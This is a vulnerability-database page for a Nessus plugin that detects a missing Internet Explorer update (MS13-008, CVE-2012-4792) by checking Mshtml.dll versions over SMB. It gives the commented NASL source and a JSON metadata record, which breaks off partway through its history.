MS13-008: Security Update for Internet Explorer (2799329)
2013-01-14T00:00:00
ID SMB_NT_MS13-008.NASL Type nessus Reporter This script is Copyright (C) 2013-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
The remote host is missing Internet Explorer (IE) Security Update
2799329.
The installed version of IE is affected by a use-after-free vulnerability in the CButton object of Mshtml.dll (CVE-2012-4792). An attacker who convinces a user to view a specially crafted web page could exploit it to execute arbitrary code on the remote host; public exploit code exists (including a Metasploit module) and the flaw has been exploited by malware.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
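if (description)
{
  script_id(63522);
  script_version("1.16");
  script_cvs_date("Date: 2018/11/15 20:50:31");

  # CVE-2012-4792: use-after-free in the CButton object of Mshtml.dll,
  # addressed by MS13-008 / KB2799329.
  script_cve_id("CVE-2012-4792");
  script_bugtraq_id(57070);
  script_xref(name:"CERT", value:"154201");
  # Two public Exploit-DB entries exist for this flaw. An earlier revision
  # of this plugin passed both in a single script_xref() call, which only
  # registered the first one; list them as separate xrefs instead.
  script_xref(name:"EDB-ID", value:"23754");
  script_xref(name:"EDB-ID", value:"23785");
  script_xref(name:"MSFT", value:"MS13-008");
  script_xref(name:"MSKB", value:"2799329");

  script_name(english:"MS13-008: Security Update for Internet Explorer (2799329)");
  script_summary(english:"Checks version of Mshtml.dll");

  script_set_attribute(attribute:"synopsis", value:"The remote host is affected by a code execution vulnerability.");
  # Finding text shown to the user: say what the flaw is and that it is
  # actively exploited, so the report conveys the real urgency.
  script_set_attribute(
    attribute:"description",
    value:
"The remote host is missing Internet Explorer (IE) Security Update
2799329.

The installed version of IE is affected by a use-after-free
vulnerability in the CButton object of Mshtml.dll (CVE-2012-4792).
An attacker who convinces a user to view a specially crafted web page
could exploit this to execute arbitrary code on the remote host.
Public exploit code is available and the vulnerability has been
exploited in the wild."
  );
  script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008");
  script_set_attribute(
    attribute:"solution",
    value:
"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,
2008 R2."
  );

  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");

  # Exploit status: weaponized modules exist in Metasploit and Core Impact,
  # and the flaw has been seen exploited by malware.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  # The vulnerability was public (2012/12/28) before the patch shipped
  # (2013/01/14), i.e. it was an unpatched, in-the-wild issue for ~2 weeks.
  script_set_attribute(attribute:"vuln_publication_date", value:"2012/12/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/01/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/01/14");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:ie");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows : Microsoft Bulletins");

  script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");

  # Runs only after hotfix enumeration and the bulletin-check gate; the
  # check itself needs SMB (139/445) or a patch-management integration.
  script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
  script_require_keys("SMB/MS_Bulletin_Checks/Possible");
  script_require_ports(139, 445, "Host/patch_management_checks");

  exit(0);
}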
include("audit.inc");
include("smb_func.inc");
include("smb_hotfixes.inc");
include("smb_hotfixes_fcheck.inc");
include("misc_func.inc");
# Gate: only run when the dependency plugin decided a bulletin check is
# possible (SMB credentials or a patch-management integration available).
get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = 'MS13-008';
kb = '2799329';

# Patch-management path: report the missing KB from the management
# system's data instead of over SMB. NOTE(review): presumably
# hotfix_check_3rd_party() exits on its own once it reaches a verdict, so
# the SMB checks below only run when it could not decide -- confirm
# against smb_hotfixes.inc.
kbs = make_list(kb);
if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);

# SMB path: requires the registry to have been enumerated and the Windows
# version to be known.
get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

# Restrict to the OS / service-pack combinations passed here (XP SP3,
# 2003 SP2, Vista/2008 SP2, 7/2008 R2 SP0 and SP1). Caveat for analysts:
# any other combination is audited as NOT affected, so an unsupported
# service pack that never received KB2799329 is not flagged by this
# plugin. Server Core installs are skipped as well.
if (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);
if (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);

# Resolve %SystemRoot% and derive the administrative share that holds it
# (e.g. "C:\Windows" -> "C$"); the file-version checks below read
# Mshtml.dll through that share, so the scan credentials must be able to
# open it -- otherwise the plugin audits out instead of guessing.
rootfile = hotfix_get_systemroot();
if (!rootfile) exit(1, "Failed to get the system root.");

share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:rootfile);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);
# File-version check on Mshtml.dll under %SystemRoot%\system32. Each
# hotfix_is_vulnerable() call covers one OS / service pack / IE major
# version; presumably it flags the host when the installed file version
# lies in [min_version, version) where "version" is the fixed build --
# confirm against smb_hotfixes_fcheck.inc. The two ranges per IE version
# track the two build-number series Microsoft ships (builds >= .20000 vs.
# below); these look like the LDR/QFE and GDR servicing branches, verify
# against KB2799329. Only IE 6, 7 and 8 appear in the table.
# NOTE(review): only \system32 is examined; on x64 hosts the 32-bit
# Mshtml.dll under SysWOW64 is not checked by this plugin.
if (
# Windows 7 / 2008 R2 (both report os 6.1; SP1 and SP0 have separate builds)
#
# - Internet Explorer 8
hotfix_is_vulnerable(os:"6.1", sp:1, file:"Mshtml.dll", version:"8.0.7601.22185", min_version:"8.0.7601.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"6.1", sp:1, file:"Mshtml.dll", version:"8.0.7601.18021", min_version:"8.0.7601.17000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"6.1", sp:0, file:"Mshtml.dll", version:"8.0.7600.21393", min_version:"8.0.7600.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"6.1", sp:0, file:"Mshtml.dll", version:"8.0.7600.17185", min_version:"8.0.7600.16000", dir:"\system32", bulletin:bulletin, kb:kb) ||
# Vista / 2008 (os 6.0, SP2 only)
#
# - Internet Explorer 8
hotfix_is_vulnerable(os:"6.0", sp:2, file:"Mshtml.dll", version:"8.0.6001.23462", min_version:"8.0.6001.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"6.0", sp:2, file:"Mshtml.dll", version:"8.0.6001.19394", min_version:"8.0.6001.18000", dir:"\system32", bulletin:bulletin, kb:kb) ||
# - Internet Explorer 7
hotfix_is_vulnerable(os:"6.0", sp:2, file:"Mshtml.dll", version:"7.0.6002.22995", min_version:"7.0.6002.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"6.0", sp:2, file:"Mshtml.dll", version:"7.0.6002.18747", min_version:"7.0.6002.18000", dir:"\system32", bulletin:bulletin, kb:kb) ||
# Windows 2003 / XP 64-bit (os 5.2, SP2). The lower branch starts at
# 8.0.0.0 / 7.0.0.0 rather than a specific build, so any pre-release or
# RTM IE build on this OS is treated as unpatched.
#
# - Internet Explorer 8
hotfix_is_vulnerable(os:"5.2", sp:2, file:"Mshtml.dll", version:"8.0.6001.23462", min_version:"8.0.6001.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"5.2", sp:2, file:"Mshtml.dll", version:"8.0.6001.19394", min_version:"8.0.0.0", dir:"\system32", bulletin:bulletin, kb:kb) ||
# - Internet Explorer 7
hotfix_is_vulnerable(os:"5.2", sp:2, file:"Mshtml.dll", version:"7.0.6000.21319", min_version:"7.0.6000.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"5.2", sp:2, file:"Mshtml.dll", version:"7.0.6000.17117", min_version:"7.0.0.0", dir:"\system32", bulletin:bulletin, kb:kb) ||
# - Internet Explorer 6
hotfix_is_vulnerable(os:"5.2", sp:2, file:"Mshtml.dll", version:"6.0.3790.5098", min_version:"6.0.0.0", dir:"\system32", bulletin:bulletin, kb:kb) ||
# Windows XP x86 (os 5.1, SP3); same lower-branch floor as above.
#
# - Internet Explorer 8
hotfix_is_vulnerable(os:"5.1", sp:3, file:"Mshtml.dll", version:"8.0.6001.23462", min_version:"8.0.6001.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"5.1", sp:3, file:"Mshtml.dll", version:"8.0.6001.19394", min_version:"8.0.0.0", dir:"\system32", bulletin:bulletin, kb:kb) ||
# - Internet Explorer 7
hotfix_is_vulnerable(os:"5.1", sp:3, file:"Mshtml.dll", version:"7.0.6000.21319", min_version:"7.0.6000.20000", dir:"\system32", bulletin:bulletin, kb:kb) ||
hotfix_is_vulnerable(os:"5.1", sp:3, file:"Mshtml.dll", version:"7.0.6000.17117", min_version:"7.0.0.0", dir:"\system32", bulletin:bulletin, kb:kb) ||
# - Internet Explorer 6
hotfix_is_vulnerable(os:"5.1", sp:3, file:"Mshtml.dll", version:"6.0.2900.6325", min_version:"6.0.2900.0", dir:"\system32", bulletin:bulletin, kb:kb)
)
{
# Vulnerable: record the missing bulletin in the KB for other plugins,
# report a hole, and finish the file-version session before exiting.
set_kb_item(name:"SMB/Missing/"+bulletin, value:TRUE);
hotfix_security_hole();
hotfix_check_fversion_end();
exit(0);
}
else
{
# No branch matched: close the file-version session and audit the host as
# not affected (this also covers hosts where no listed IE build was found).
hotfix_check_fversion_end();
audit(AUDIT_HOST_NOT, 'affected');
}
{"id": "SMB_NT_MS13-008.NASL", "bulletinFamily": "scanner", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.", "published": "2013-01-14T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/63522", "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "cvelist": ["CVE-2012-4792"], "type": "nessus", "lastseen": "2019-11-03T12:15:46", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.", "edition": 13, "enchantments": {"dependencies": {"modified": "2019-10-28T21:19:47", "references": [{"idList": ["CVE-2012-4792"], "type": "cve"}, {"idList": ["THN:5ACF233F4E37E6A4975B246F2082107C", "THN:7ACF921BA3C582C8760C348FD2475BC2"], "type": "thn"}, {"idList": ["SMB_KB2794220.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:23754", "EDB-ID:23785"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310902699", "OPENVAS:902699"], "type": "openvas"}, {"idList": ["SMNTC-57070"], "type": "symantec"}, {"idList": ["THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", 
"THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450"], "type": "threatpost"}, {"idList": ["SECURITYVULNS:VULN:12835"], "type": "securityvulns"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF"], "type": "metasploit"}, {"idList": ["1337DAY-ID-20069"], "type": "zdt"}, {"idList": ["SSV:60551"], "type": "seebug"}, {"idList": ["PACKETSTORM:119168", "PACKETSTORM:119186"], "type": "packetstorm"}, {"idList": ["VU:154201"], "type": "cert"}, {"idList": ["SAINT:E4225C669F34358E2FC7EE71D604FA0A", "SAINT:DCB95B394157102378C2A8CADFE280E8", "SAINT:2EF245955FDA0606FF9A743D9132C6A8"], "type": "saint"}]}, "score": {"modified": "2019-10-28T21:19:47", "value": 9.6, "vector": "NONE"}}, "hash": "c4f54d4517682ed35fc8b70b87dcd6cb94a30b4ab114ade0dd8faf6a38ecc1ae", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "6f08f84e3b368ff5e99adc78c0a77eab", "key": "references"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "538d0d1c332ac3dd3e1d9aa41bec0d37", "key": "description"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "61dcfa1ba98bb298fd5d06d3d95c176e", "key": "sourceData"}, {"hash": "528cea5b87bf77107bd9f05291bbffe5", "key": "reporter"}, {"hash": "e8ec5d02e016cac43a330cd6a189f48c", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2019-10-28T21:19:47", "modified": "2019-10-02T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", 
"objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, 
\"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", 
version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 11}, "differentElements": ["modified"], "edition": 13, "lastseen": "2019-10-28T21:19:47"}, 
{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update 2799329.\n\nThe installed version of IE is affected by a vulnerability that could allow an attacker to execute arbitrary code on the remote host.", "edition": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "f3161c9ff7fe5f9ade3dbf6305d95c338de94004d15776389459232ec34a8f00", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "6f08f84e3b368ff5e99adc78c0a77eab", "key": "references"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "853e90e76cb8bc44659046710a5f8a59", "key": "description"}, {"hash": "61dcfa1ba98bb298fd5d06d3d95c176e", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2018-11-17T02:55:02", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": 
["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object 
Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) 
